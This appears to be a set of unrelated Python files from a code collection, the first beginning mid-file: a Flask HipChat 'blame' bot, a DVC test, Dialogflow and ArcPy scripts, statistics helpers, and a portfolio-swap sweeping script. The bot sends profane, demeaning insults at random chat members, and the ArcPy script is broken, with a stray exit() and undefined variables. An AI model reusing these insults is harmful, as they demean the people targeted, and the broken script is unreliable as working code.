Flask\nfrom flask import json\nfrom flask import jsonify\nfrom flask import request\nimport os\nimport random\nimport hipchat_client\n\nINSULTS = [\n    \"Is your ass jealous of 
the amount of shit that just came out of your mouth?\",\n \"I bet your brain feels as good as new, seeing that you never use it.\",\n \"I'd like to see things from your point of view but I can't seem to get my head that far up my ass.\",\n \"I could eat a bowl of alphabet soup and shit out a smarter statement than that.\",\n \"If I wanted to kill myself I'd climb your ego and jump to your IQ.\",\n \"If you're gonna be a smartass, first you have to be smart. Otherwise you're just an ass.\",\n \"It's better to let someone think you are an Idiot than to open your mouth and prove it.\",\n \"I have neither the time nor the crayons to explain this to you.\",\n \"Why don't you slip into something more comfortable -- like a coma.\",\n \"I may love to shop but I'm not buying your bullshit.\",\n \"Well I could agree with you, but then we'd both be wrong.\",\n \"You're the reason the gene pool needs a lifeguard.\",\n \"You have two brains cells, one is lost and the other is out looking for it.\",\n \"If I gave you a penny for your thoughts, I'd get change.\",\n \"You're as bright as a black hole, and twice as dense.\",\n \"If you spoke your mind, you'd be speechless.\",\n \"Shock me, say something intelligent.\",\n \"So you've changed your mind, does this one work any better?\",\n \"If your brain was made of chocolate, it wouldn't fill an M&M.\",\n \"I can explain it to you, but I can't understand it for you.\",\n \"You are proof that evolution CAN go in reverse.\",\n \"You do realize makeup isn't going to fix your stupidity?\",\n \"Some drink from the fountain of knowledge; you only gargled.\",\n \"It's kinda sad watching you attempt to fit your entire vocabulary into a sentence.\",\n \"You're a person of rare intelligence. It's rare when you show any.\",\n \"I thought you were attractive, but then you opened your mouth.\",\n 'You stare at frozen juice cans because they say, \"concentrate\".',\n \"You're so stupid you tried to wake a sleeping bag.\",\n \"I don't know what makes you so stupid, but it really works!\",\n \"Aww, it's so cute when you try to talk about things you don't understand.\",\n \"Am I getting smart with you? How would you know?\",\n \"I'm not saying I hate you, but I would unplug your life support to charge my phone.\",\n \"You must have been born on a highway because that's where most accidents happen.\",\n \"You bring everyone a lot of joy, when you leave the room.\",\n \"You shouldn't play hide and seek, no one would look for you.\",\n \"I have neither the time nor the crayons to explain this to you.\"\n]\napp = Flask(__name__)\n\n@app.route(\"/\", methods=['GET'])\ndef hello():\n return \"Hello World!\"\n\n@app.route(\"/\", methods=['POST'])\ndef blame():\n request_data = to_json(request)\n \n requesters_room = _extract_requesters_room(request_data)\n arguments = _extract_arguments(request_data)\n requester = _extract_requester(request_data)\n \n guilty = None\n for argument in arguments:\n if '@' in argument:\n guilty = argument\n \n if not guilty:\n members = hipchat_client.get_room_members(requesters_room)\n \n guilty = '@' + random.choice(members) if members else 'all'\n \n if '--with-violence' in arguments:\n message = 'Hey ' + guilty + ' ! ' + random.choice(INSULTS) + ' (megusta)'\n elif '-h' in arguments or '--help' in arguments:\n message = \"@\" + requester + \" I have neither the time nor the crayons to explain this to you.\"\n elif 'why' in arguments:\n message = \"Because !!!!! 
https://labibliothequedaelinel.files.wordpress.com/2016/10/image.gif?w=656\"\n else:\n message = 'I blame ' + guilty + ' ! >:-('\n \n return jsonify({\n \"color\": \"red\",\n \"message\": message,\n \"notify\": False,\n \"message_format\": \"text\"\n })\n \ndef to_json(request):\n return json.loads(request.data)\n\ndef _extract_arguments(request_data):\n command = request_data['item']['message']['message']\n\n return command.split(' ')[1:]\n\n\ndef _extract_requester(request_data):\n return request_data['item']['message']['from']['mention_name']\n\n\ndef _extract_requesters_room(request_data):\n return request_data['item']['room']['id']\n\nif __name__ == \"__main__\":\n app.debug = True\n app.run(host=os.getenv('IP', '0.0.0.0'), port=int(os.getenv('PORT', '8080')))","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":4521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"427544139","text":"import os\n\nfrom dvc.utils.fs import move, remove\n\n\nclass TestRemote:\n def test(self, tmp_dir, dvc, remote): # pylint: disable=W0613\n (stage,) = tmp_dir.dvc_gen(\"foo\", \"foo\")\n out = stage.outs[0]\n cache = out.cache_path\n foo_hash = out.hash_info\n foo_hashes = out.get_used_objs().get(None, set())\n\n (stage_dir,) = tmp_dir.dvc_gen(\n {\n \"data_dir\": {\n \"data_sub_dir\": {\"data_sub\": \"data_sub\"},\n \"data\": \"data\",\n \"empty\": \"\",\n }\n }\n )\n\n out_dir = stage_dir.outs[0]\n cache_dir = out_dir.cache_path\n dir_hash = out_dir.hash_info\n dir_hashes = {dir_hash} | {oid for _, _, oid in out_dir.obj}\n\n def _check_status(status, **kwargs):\n for key in (\"ok\", \"missing\", \"new\", \"deleted\"):\n expected = kwargs.get(key, set())\n assert expected == set(getattr(status, key))\n\n # Check status\n status = dvc.cloud.status(foo_hashes)\n _check_status(status, new={foo_hash})\n\n status_dir = dvc.cloud.status(dir_hashes)\n _check_status(status_dir, new=dir_hashes)\n\n # Move cache and check status\n # See issue https://github.com/iterative/dvc/issues/4383 for details\n backup_dir = dvc.odb.local.cache_dir + \".backup\"\n move(dvc.odb.local.cache_dir, backup_dir)\n status = dvc.cloud.status(foo_hashes)\n _check_status(status, missing={foo_hash})\n\n status_dir = dvc.cloud.status(dir_hashes)\n _check_status(status_dir, missing=dir_hashes)\n\n # Restore original cache:\n remove(dvc.odb.local.cache_dir)\n move(backup_dir, dvc.odb.local.cache_dir)\n\n # Push and check status\n dvc.cloud.push(foo_hashes)\n assert os.path.exists(cache)\n assert os.path.isfile(cache)\n\n dvc.cloud.push(dir_hashes)\n assert os.path.isfile(cache_dir)\n\n status = dvc.cloud.status(foo_hashes)\n _check_status(status, ok={foo_hash})\n\n status_dir = dvc.cloud.status(dir_hashes)\n _check_status(status_dir, ok=dir_hashes)\n\n # Remove and check status\n remove(dvc.odb.local.cache_dir)\n\n status = dvc.cloud.status(foo_hashes)\n _check_status(status, deleted={foo_hash})\n\n status_dir = dvc.cloud.status(dir_hashes)\n _check_status(status_dir, deleted=dir_hashes)\n\n # Pull and check status\n dvc.cloud.pull(foo_hashes)\n assert os.path.exists(cache)\n assert os.path.isfile(cache)\n with open(cache, encoding=\"utf-8\") as fd:\n assert fd.read() == \"foo\"\n\n dvc.cloud.pull(dir_hashes)\n assert os.path.isfile(cache_dir)\n\n status = dvc.cloud.status(foo_hashes)\n _check_status(status, ok={foo_hash})\n\n status_dir = dvc.cloud.status(dir_hashes)\n _check_status(status_dir, 
ok=dir_hashes)\n","sub_path":"dvc/testing/test_remote.py","file_name":"test_remote.py","file_ext":"py","file_size_in_byte":2945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} {"seq_id":"222764041","text":"# Problem 015\n# Starting in the top left corner of a 2×2 grid, and only being able to\n# move to the right and down, there are exactly 6 routes\n# to the bottom right corner.\n# How many such routes are there through a 20×20 grid?\nanswer = 137846528820\ntarget = 20\n\n\ndef solution():\n    # compute all combinations for 'to right' moves. 'Down' movements\n    # are complementary.\n\n    result = 1\n\n    for i in range(1, target + 1):\n        result = result * (target + i) // i\n\n    return result\n\n\nif __name__ == '__main__':\n    from timeit import Timer\n    solution_time = Timer(solution).timeit(number=100)\n    time = round(solution_time / 100, 4)\n    print(f'Correct answer is: \\t\\t{answer}')\n    print(f'Solution answer is: \\t{solution()}')\n    print(f'Average solution execution time: {time}')\n","sub_path":"015/problem_015.py","file_name":"problem_015.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} {"seq_id":"177942156","text":"from datetime import datetime\n\nimport cv2\nfrom constants import Direction, COLUMN, TIMEOUT_FOR_TRACKER\nfrom human_tracker import HumanTracker\nfrom human_validator import HumanValidator\nfrom logger import Logger\n\n\nclass HumanTrackerHandler:\n    human_tracking_dict = {}\n\n    @classmethod\n    def draw_id_centroid_on_output_frame(cls, frame, centroid, objectID):\n        # draw both the ID of the object and the centroid of the\n        # object on the output frame\n        text = \"ID {}\".format(objectID)\n        cv2.putText(frame, text, (centroid[0] - 10, centroid[1] - 10)\n                    , cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)\n        cv2.circle(frame, (centroid[0], centroid[1]), 4,\n                   (0, 255, 0), -1)\n\n    @classmethod\n    def yield_a_human_tracker_object(cls, objects):\n\n        for (objectID, centroid) in objects.items():\n            # check to see if a trackable object exists for the current\n            # object ID\n            human_tracker_object = cls.human_tracking_dict.get(objectID, None)\n\n            # if there is no existing trackable object, create one\n            if not human_tracker_object:\n                Logger.logger().debug(\"Creating a new speed tracker object with object id = {}.\".format(objectID))\n                human_tracker_object = HumanTracker(objectID, centroid)\n                cls.human_tracking_dict[objectID] = human_tracker_object\n\n            else:\n                human_tracker_object.centroids.append(centroid)\n                human_tracker_object.timestamp_list.append(datetime.now())\n            yield human_tracker_object, objectID, centroid\n\n    @classmethod\n    def clear_object_from_speed_tracking_dict(cls, objectID):\n        del (cls.human_tracking_dict[objectID])\n\n    @classmethod\n    def handle_the_case_where_grace_time_for_tracking_is_over(cls, now, human_tracker_object, keep_dict_items):\n        \"\"\"\n        This method handles the case where the grace time (TIMEOUT_FOR_TRACKER) for the tracker object is over.\n        :param now: timestamp\n        :param human_tracker_object: Instance of type HumanTracker.\n        :param keep_dict_items: Preserve dictionary items. 
(for debug purpose)\n :return:\n \"\"\"\n if human_tracker_object.estimated and human_tracker_object.logged and not keep_dict_items:\n # Delete this object from speed tracking dict.\n Logger.logger().debug(\"Deleting objectId {} from the human_tracking_dict.\".format(\n human_tracker_object.objectID))\n cls.clear_object_from_speed_tracking_dict(human_tracker_object.objectID)\n else:\n Logger.logger().debug(\"Computing direction for objectId {} because there are no recorded\"\n \" movements for this object in human_tracking_dict.\".format(\n human_tracker_object.objectID))\n cls.compute_direction(human_tracker_object)\n human_tracker_object.estimated = True\n # Finally log it.\n Logger.logger().debug(\"Perform logging for objectId {} found the human_tracking_dict.\".format(\n human_tracker_object.objectID))\n HumanValidator.validate_column_movement(human_tracker_object, now, None,\n human_tracker_object.objectID)\n\n @classmethod\n def compute_direction_for_dangling_object_ids(cls, keep_dict_items=False):\n \"\"\"\n This method computes direction for dangling objects found in speed_tracking_dict.\n This can happen when the person was tracked only at a few sampling points (column traversal).\n :return:\n \"\"\"\n for object_id, human_tracker_object in cls.human_tracking_dict.copy().items():\n now = datetime.now()\n duration = now - human_tracker_object.timestamp_list[-1]\n if duration.total_seconds() > TIMEOUT_FOR_TRACKER:\n cls.handle_the_case_where_grace_time_for_tracking_is_over(now, human_tracker_object, keep_dict_items)\n\n @classmethod\n def compute_direction(cls, trackable_object):\n \"\"\"\n Compute the direction of the person movement.\n :param trackable_object: object\n :return:\n \"\"\"\n direction = trackable_object.centroids[-1][COLUMN] - trackable_object.centroids[0][COLUMN]\n if direction > 0:\n trackable_object.direction = Direction.ENTER\n else:\n trackable_object.direction = Direction.EXIT\n\n @classmethod\n def record_movement(cls, trackable_object):\n if not trackable_object.estimated:\n cls.compute_direction(trackable_object)\n","sub_path":"Occupancy_Tracker/human_tracker_handler.py","file_name":"human_tracker_handler.py","file_ext":"py","file_size_in_byte":4604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"575473410","text":"def isPalindromes(texts):\n characters = ''''\"!?,.:;'''\n result = []\n for i in range(len(texts)):\n texts[i] = texts[i].lower().replace(' ','')\n for x in range(len(characters)):\n texts[i] = texts[i].replace(characters[x],'')\n if texts[i] == texts[i][::-1]:\n result.append(True)\n else: result.append(False)\n return result\ntexts = [\"Madam, I'm Adam.\",\"rotator\",\"Hello\",\"nurses run\"]\nprint(isPalindromes(texts))\n","sub_path":"구현/이해강_Palindrome.py","file_name":"이해강_Palindrome.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"255733630","text":"import os\nfrom google.cloud import dialogflow\nimport google.api_core.exceptions\nimport json\nimport sys\nimport argparse\nimport uuid\nfrom environs import Env\n\n\nenv = Env()\nenv.read_env()\n\n\ndef parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--action',\n dest='action',\n required=True,\n help='action to do'\n )\n\n parser.add_argument(\n '--path',\n dest='path',\n required=False,\n help='Path to json file with intents'\n )\n\n parser.add_argument(\n '--intent_id',\n dest='intent_id',\n 
required=False,\n help='id intent to delete'\n )\n\n return parser.parse_args()\n\n\ndef list_intents(project_id):\n intents_client = dialogflow.IntentsClient()\n parent = dialogflow.AgentsClient.agent_path(project_id)\n intents = intents_client.list_intents(request={\"parent\": parent})\n\n for intent in intents:\n print(\"=\" * 20)\n print(f\"Intent name: {intent.name}\")\n print(f\"Intent display_name: {intent.display_name}\")\n print(f\"Action: {intent.action}\\n\")\n print(f\"Root followup intent: {intent.root_followup_intent_name}\")\n print(f\"Parent followup intent: \\\n {intent.parent_followup_intent_name}\\n\")\n\n print(\"Input contexts:\")\n for input_context_name in intent.input_context_names:\n print(\"\\tName: {}\".format(input_context_name))\n\n print(\"Output contexts:\")\n for output_context in intent.output_contexts:\n print(\"\\tName: {}\".format(output_context.name))\n\n\ndef create_intent(\n project_id,\n display_name,\n training_phrases_parts,\n message_texts\n):\n\n \"\"\"Create an intent of the given intent type.\"\"\"\n\n intents_client = dialogflow.IntentsClient()\n\n parent = dialogflow.AgentsClient.agent_path(project_id)\n training_phrases = []\n for training_phrases_part in training_phrases_parts:\n part = dialogflow.Intent.TrainingPhrase.Part(\n text=training_phrases_part\n )\n # Here we create a new training phrase for each provided part.\n training_phrase = dialogflow.Intent.TrainingPhrase(parts=[part])\n training_phrases.append(training_phrase)\n\n text = dialogflow.Intent.Message.Text(text=message_texts)\n message = dialogflow.Intent.Message(text=text)\n\n intent = dialogflow.Intent(\n display_name=display_name,\n training_phrases=training_phrases, messages=[message]\n )\n\n response = intents_client.create_intent(\n request={\"parent\": parent, \"intent\": intent}\n )\n\n print(\"Intent created: {}\".format(response))\n\n\ndef delete_intent(project_id, intent_id):\n \"\"\"Delete intent with the given intent type and intent value.\"\"\"\n\n intents_client = dialogflow.IntentsClient()\n intent_path = intents_client.intent_path(project_id, intent_id)\n intents_client.delete_intent(request={\"name\": intent_path})\n\n\ndef read_file(filepath):\n with open(filepath, 'r') as file:\n file_content = json.load(file)\n return file_content\n\n\ndef main():\n project_id = env('PROJECT_ID')\n args = parse_arguments()\n\n if args.action == 'create' and os.path.exists(args.path):\n try:\n intent_content = read_file(args.path)\n except FileNotFoundError:\n sys.exit('File not found. 
Exit')\n\n for intent in intent_content:\n questions = intent_content[intent]['questions']\n answer = intent_content[intent]['answer']\n try:\n create_intent(project_id, intent, questions, [answer])\n except google.api_core.exceptions.ServiceUnavailable:\n sys.exit(\"Can't reach google service\")\n except google.api_core.exceptions.FailedPrecondition:\n print(f'Failed precondition for intent with name \"{intent}\"')\n continue\n\n elif args.action == 'list':\n list_intents(project_id)\n\n elif args.action == 'delete' and args.intent_id:\n try:\n isinstance(uuid.UUID(args.intent_id), uuid.UUID)\n except ValueError:\n sys.exit('Invalid intent ID')\n delete_intent(project_id, args.intent_id)\n else:\n sys.exit('Invalid arguments')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"intent.py","file_name":"intent.py","file_ext":"py","file_size_in_byte":4262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"468532010","text":"#!/usr/bin/env python\nimport numpy\nimport numpy as np\nimport scipy.special\n\n_alpha = 0.32\n\n\ndef interval(best,lo=np.nan,hi=np.nan):\n \"\"\"\n Pythonized interval for easy output to yaml\n \"\"\"\n return [float(best),[float(lo),float(hi)]]\n\ndef mean_interval(data, alpha=_alpha):\n \"\"\"\n Interval assuming gaussian posterior.\n \"\"\"\n mean =np.mean(data)\n sigma = np.std(data)\n scale = scipy.stats.norm.ppf(1-alpha/2.)\n return interval(mean,mean-scale*sigma,mean+scale*sigma)\n\n\ndef median_interval(data, alpha=_alpha):\n \"\"\"\n Median including bayesian credible interval.\n \"\"\"\n q = [100*alpha/2., 50, 100*(1-alpha/2.)]\n lo,med,hi = numpy.percentile(data,q)\n return interval(med,lo,hi)\n \ndef peak(data, bins=100):\n num,edges = np.histogram(data,bins=bins)\n centers = (edges[1:]+edges[:-1])/2.\n return centers[np.argmax(num)]\n\ndef kde_peak(data, samples=1000):\n \"\"\"\n Identify peak using Gaussian kernel density estimator.\n \"\"\"\n return kde(data,samples)[0]\n\ndef kde(data, samples=1000):\n \"\"\"\n Identify peak using Gaussian kernel density estimator.\n \"\"\"\n # Clipping of severe outliers to concentrate more KDE samples in the parameter range of interest\n mad = np.median(np.fabs(np.median(data) - data))\n cut = (data > np.median(data) - 5. * mad) & (data < np.median(data) + 5. 
* mad)\n x = data[cut]\n kde = scipy.stats.gaussian_kde(x)\n # No penalty for using a finer sampling for KDE evaluation except computation time\n values = np.linspace(np.min(x), np.max(x), samples) \n kde_values = kde.evaluate(values)\n peak = values[np.argmax(kde_values)]\n return values[np.argmax(kde_values)], kde.evaluate(peak)\n\n\ndef peak_interval(data, alpha=_alpha, samples=1000):\n \"\"\"\n Identify interval using Gaussian kernel density estimator.\n \"\"\"\n peak = kde_peak(data,samples)\n x = np.sort(data.flat); n = len(x)\n # The number of entries in the interval\n window = int(np.rint((1.0-alpha)*n))\n # The start, stop, and width of all possible intervals\n starts = x[:n-window]; ends = x[window:]\n widths = ends - starts\n # Just the intervals containing the peak\n select = (peak >= starts) & (peak <= ends)\n widths = widths[select]\n if len(widths) == 0:\n raise ValueError('Too few elements for interval calculation')\n min_idx = np.argmin(widths)\n lo = x[min_idx]\n hi = x[min_idx+window]\n return interval(peak,lo,hi)\n\ndef min_interval(data, alpha=_alpha):\n x = np.sort(data.flat); n = len(x)\n # The number of entries in the interval\n window = int(np.rint((1.0-alpha)*n))\n # The start, stop, and width of all possible intervals\n starts = x[:n-window]; ends = x[window:]\n widths = ends - starts\n if len(widths) == 0:\n raise ValueError('Too few elements for interval calculation')\n min_idx = np.argmin(widths)\n lo = x[min_idx]\n hi = x[min_idx+window]\n mean = (hi+lo)/2.\n return interval(mean,lo,hi)\n\n\ndef norm_cdf(x):\n # Faster than scipy.stats.norm.cdf\n #https://en.wikipedia.org.wiki/Normal_distribution\n return 0.5*(1 + scipy.special.erf(x/np.sqrt(2)))\n\ndef random_pdf(value,pdf,size=None):\n if size is None: size = 1.0\n cdf = np.cumsum(pdf)\n cdf /= cdf[-1]\n fn = scipy.interpolate.interp1d(cdf, range(0, len(cdf)))\n index = np.rint(fn(np.random.uniform(size=size))).astype(int)\n return value[index]\n\ndef sky(lon=None,lat=None,size=1):\n \"\"\"\n Outputs uniform points on sphere from:\n [0 < lon < 360] & [-90 < lat < 90]\n \"\"\"\n if lon is None:\n umin,umax = 0,1\n else:\n lon = np.asarray(lon)\n lon = np.radians(lon + 360.*(lon<0))\n if lon.size==1: umin=umax=lon/(2*np.pi)\n elif lon.size==2: umin,umax=lon/(2*np.pi)\n else: raise Exception('...')\n \n if lat is None:\n vmin,vmax = -1,1\n else:\n lat = np.asarray(lat)\n lat = np.radians(90 - lat)\n if lat.size==1: vmin=vmax=np.cos(lat)\n elif lat.size==2: vmin,vmax=np.cos(lat)\n else: raise Exception('...')\n\n phi = 2*np.pi*np.random.uniform(umin,umax,size=size)\n theta = np.arcsin(np.random.uniform(vmin,vmax,size=size))\n return np.degrees(phi),np.degrees(theta)\n\nif __name__ == \"__main__\":\n import argparse\n description = \"python script\"\n parser = argparse.ArgumentParser(description=description)\n parser.add_argument('args',nargs=argparse.REMAINDER)\n opts = parser.parse_args(); args = opts.args\n\n import pylab as plt\n ax=plt.subplot(221,projection='aitoff')\n ax.grid(True)\n lon,lat = sky(size=1e3)\n lon,lat= np.radians([lon-360.*(lon>180),lat])\n ax.scatter(lon,lat,marker='.',s=2)\n\n ax=plt.subplot(222,projection='aitoff')\n ax.grid(True)\n lon,lat = sky(size=1e3,lat=[30,45])\n lon,lat= np.radians([lon-360.*(lon>180),lat])\n ax.scatter(lon,lat,marker='.',s=2)\n\n ax=plt.subplot(223,projection='aitoff')\n ax.grid(True)\n lon,lat = sky(size=1e3,lon=[30,45])\n lon,lat= np.radians([lon-360.*(lon>180),lat])\n ax.scatter(lon,lat,marker='.',s=2)\n\n ax=plt.subplot(224,projection='aitoff')\n 
ax.grid(True)\n lon,lat = sky(size=1e3,lon=[0,45],lat=[30,45])\n lon,lat= np.radians([lon-360.*(lon>180),lat])\n ax.scatter(lon,lat,marker='.',s=2)\n","sub_path":"ugali/utils/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":5266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"468480744","text":"from django.conf.urls import patterns, include\nfrom django.contrib.auth.decorators import login_required as lr\nfrom django.contrib.auth.decorators import permission_required as pr\n\nfrom src import url\nfrom src.vendor.views import MyTemplateView\nfrom .views import IncidenceRestView\nfrom .views import StatisticsRestView\nfrom xilema.views import GenericExcelView\n\n\nanomalies = patterns(\n '',\n url(r'^$',\n lr(MyTemplateView.as_view(\n template_name='incidence/anomalies.html')),\n name='incidencesanomalies', permissions=[\"list_incidences\", \"export_excel\"]))\n\napi = patterns(\n '',\n url(r'^anomalies/$',\n pr('actions.change_actionclient')(IncidenceRestView.as_view()),\n name='anomalies'),\n\n url(r'^statistics/$',\n pr('actions.change_actionclient')(StatisticsRestView.as_view()),\n name='statistics'))\n\nurlpatterns = patterns(\n '',\n url(r'^$',\n lr(MyTemplateView.as_view(\n template_name='incidence/index.html')),\n name='statisticsincidences', permissions=[\"list_incidences\"]),\n\n url(r'^anomalies/',\n include(anomalies, namespace='anomalies')),\n\n url(r'^export/$',\n lr(GenericExcelView.as_view()),\n name='ex'),\n\n url(r'^api/',\n include(api, namespace='api')))\n","sub_path":"src/apps/incidence/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"192536923","text":"import arcpy\nimport os\nimport pandas as pd\nimport re\n\nfrom Dev.create_basemap import get_rasters\n\ndef process_rasters(rasters, summary, field, threshold):\n summary = summary[['scenario_id_raw', field]]\n for i, raster in enumerate(rasters):\n print(\"\\t{}\".format(i))\n raster = arcpy.Raster(raster)\n fields = [f.name for f in arcpy.ListFields(raster)]\n print(fields)\n exit()\n\n if not i:\n running = raster\n else:\n running += raster\n return running > 0\n\ndef get_fields(durations, weights):\n return [\"{}_{}_%ile\".format(d, w) for d in durations for w in weights]\n\n\ndef main():\n combo_dir = os.path.join(\"..\", \"..\", \"aquatic-model-inputs\", \"bin\", \"Intermediate\", \"CombinedRasters\")\n combo_format = re.compile(\"c_(.{2,3})_(\\d{4})$\")\n summary_file = os.path.join(\"Output\", \"test_summary.csv\")\n durations = [\"1-day\", \"90-day\"]\n weights = [\"unweighted\", \"weighted\"]\n regions = ['07']\n threshold = 90\n\n summary = pd.read_csv(summary_file)\n for region in regions:\n years, rasters = get_rasters(combo_dir, combo_format, region)\n for field in get_fields(durations, weights):\n print(region, field)\n combined = process_rasters(rasters, summary, field, threshold)\n combined.save(out_format.format(region, _class, years[0], years[-1]))\n\n\nmain()\n","sub_path":"ScenarioSelection/Dev/map_exceedances.py","file_name":"map_exceedances.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"378803163","text":"\"\"\"-----------------------------------------------------------------------------\nProject: Prime Brokerage Project\nDepartment: Prime Services\nRequester: Francois Henrion\nDeveloper: Paul 
Jacot-Guillarmod\nCR Number: 666125 (Initial Deployment)\n\nHISTORY\n================================================================================\nDate Change no Developer Description\n--------------------------------------------------------------------------------\n2011-06-17 685737 Paul J.-Guillarmod Added a function call add TPL to the portfolio swap\n2011-12-08 850928 Herman Hoon Added the Provision function call\n2012-05-08 Peter Kutnik Fixed earlier undocumented change for non cash collateral\n2014-11-20 2450799 Peter Fabian Fixing errors and exception handling\n2015-09-11 3090331 Jakub Tomaga Portfolio independent sweeping\n2018-11-12 CHG1001113453 Tibor Reiss Enable fully funded CFD for MMIBETA2\n2019-03-27 FAPE-65 Tibor Reiss Remove fully funded CFD for MMIBETA2 (yes, you are reading it correctly)\n2019-07-15 FAPE-47 Iryna Shcherbina Create a sweeping report\n2019-11-21 FAPE-147 Tibor Reiss Propagate error\n-----------------------------------------------------------------------------\"\"\"\nimport acm\n\nfrom PS_Functions import (CALENDAR, TODAY, START_DATE_KEYS, START_DATE_LIST, END_DATE_KEYS, END_DATE_LIST, DateGenerator)\nimport PS_FundingSweeper\nimport PS_TimeSeriesFunctions\nfrom at_logging import getLogger, bp_start\nfrom sweeping_report import PSwapSweepingReport\n\n\nLOGGER = getLogger()\n\n\ndef enable_custom_start_date(index, field_values):\n ael_variables[2][9] = (field_values[1] == 'Custom Date')\n return field_values\n\n\ndef enable_custom_end_date(index, field_values):\n ael_variables[4][9] = (field_values[3] == 'Custom Date')\n return field_values\n\n\n# Variable Name, Display Name, Type, Candidate Values, Default, Mandatory, Multiple, Description, Input Hook, Enabled\nael_variables = [['portfolioSwaps', 'Portfolio Swaps', 'FInstrument', None, None, 1, 1, 'Portfolio swaps that will have their funding cashflows extended', None, 1],\n ['startDate', 'Start Date', 'string', START_DATE_KEYS, 'Now', 1, 0, 'Date from which the portfolio swaps will be extended.', enable_custom_start_date, 1],\n ['startDateCustom', 'Start Date Custom', 'string', None, TODAY, 0, 0, 'Custom from date', None, 0],\n ['endDate', 'End Date', 'string', END_DATE_KEYS, 'Now', 1, 0, 'Date to which the portfolio swaps will be extended.', enable_custom_end_date, 1],\n ['endDateCustom', 'End Date Custom', 'string', None, TODAY, 0, 0, 'Custom to date', None, 0],\n ['compoundPortfolio', 'Compound Client Portfolio', 'FCompoundPortfolio', None, None, 0, 0, 'Fixed Income ValStart will be calculated for the compound portfolio to select the overnight funding spread.', None, 1],\n ['collateralPortfolios', 'Compound Collateral Portfolio', 'FCompoundPortfolio', None, None, 0, 1, 'Compound portfolio where the Collateral trades are booked.', None, 1],\n ['resweepTPL', 'Re-Sweep TPL', 'string', ['Yes', 'No'], 'No', 1, 0, 'When running backdated sweeping, indicate whether TPL should be reswept', None, 1],\n ['clientName', 'Short name', 'string', None, 'CLIENT', 0, 0],\n ['sweepingReport', 'Sweeping Report', 'string', None, None, 0, 0, 'Report with detailed breakdown of swept amounts', None, 1],\n ]\n\n\ndef ael_main(ael_dict):\n LOGGER.msg_tracker.reset()\n process_name = \"ps.extend_pswap.{0}\".format(ael_dict[\"clientName\"])\n\n with bp_start(process_name): \n if ael_dict['startDate'] == 'Custom Date':\n start_date = ael_dict['startDateCustom']\n else:\n start_date = START_DATE_LIST[ael_dict['startDate']]\n \n if ael_dict['endDate'] == 'Custom Date':\n end_date = ael_dict['endDateCustom']\n else:\n end_date = 
END_DATE_LIST[ael_dict['endDate']]\n \n resweep_tpl = ael_dict['resweepTPL'] == 'Yes'\n \n portfolio_swaps = ael_dict['portfolioSwaps']\n report_data = {}\n for portfolio_swap in portfolio_swaps:\n report_data[portfolio_swap.Name()] = ExtendPortfolioSwap(\n portfolio_swap, resweep_tpl, start_date, end_date)\n \n collateral_portfolios = ael_dict['collateralPortfolios']\n if portfolio_swaps:\n portfolio_swap = portfolio_swaps[0]\n portfolio = portfolio_swap.FundPortfolio()\n call_account = acm.FDeposit[portfolio.add_info('PSClientCallAcc')]\n if collateral_portfolios:\n collateral_portfolio = collateral_portfolios[0]\n for date in DateGenerator(start_date, end_date):\n _SetCollateralTimeSeries(collateral_portfolio, date, call_account, 'Collateral Value')\n\n report_filename = ael_dict[\"sweepingReport\"]\n if report_filename:\n try:\n file_path = report_filename.format(date=end_date.replace(\"-\", \"\"))\n report = PSwapSweepingReport(file_path, report_data)\n report.create_report()\n LOGGER.info(\"Wrote secondary output to %s\", file_path)\n except Exception:\n LOGGER.exception(\"Sweeping report wasn't generated.\")\n\n if LOGGER.msg_tracker.errors_counter:\n raise RuntimeError(\"ERRORS occurred. Please check the log.\")\n\n LOGGER.info(\"Completed Successfully\")\n\n\ndef _SetCollateralTimeSeries(collateral_portfolio, date, call_account, column_name):\n time_series_dict = {'FI': 'PS_Collateral_FI',\n 'EQ': 'PS_Collateral_EQ',\n 'Cash': 'PS_Collateral_MM'\n }\n collateral_type_grouper = acm.FAttributeGrouper('Instrument.CollateralType')\n query_folder = _GenerateValStartQuery(collateral_portfolio)\n collateral_dict = PS_FundingSweeper.TradingManagerSweeper(query_folder, date, [column_name], False,\n collateral_type_grouper, 'ZAR')\n collateral_dict_keys = iter(collateral_dict.keys())\n\n if collateral_dict_keys:\n for key in collateral_dict_keys:\n time_series_name = time_series_dict[key]\n value = collateral_dict[key]\n if value:\n value = value[0]\n PS_TimeSeriesFunctions.UpdateTimeSeriesValue(time_series_name, call_account, value, date)\n LOGGER.info('Set time series %s, value %s for %s on %s to %s',\n time_series_name, column_name, call_account.Name(), date, value)\n\n\ndef _GenerateValStartQuery(compound_portfolio):\n \"\"\"Generate a query folder that will be used to calculate Overnight Spread ValStart for the compound portfolio.\"\"\"\n query = acm.CreateFASQLQuery('FTrade', 'AND')\n query.AddAttrNode('Status', 'NOT_EQUAL', acm.EnumFromString('TradeStatus', 'Simulated'))\n query.AddAttrNode('Status', 'NOT_EQUAL', acm.EnumFromString('TradeStatus', 'Void'))\n \n # Add the sub portfolios to the query\n or_node = query.AddOpNode('OR')\n if not compound_portfolio.AllPhysicalPortfolios():\n raise ValueError(\"Portfolio %s has no physical subportfolios\" % compound_portfolio.Name())\n for portfolio in compound_portfolio.AllPhysicalPortfolios():\n or_node.AddAttrNode('Portfolio.Name', 'EQUAL', 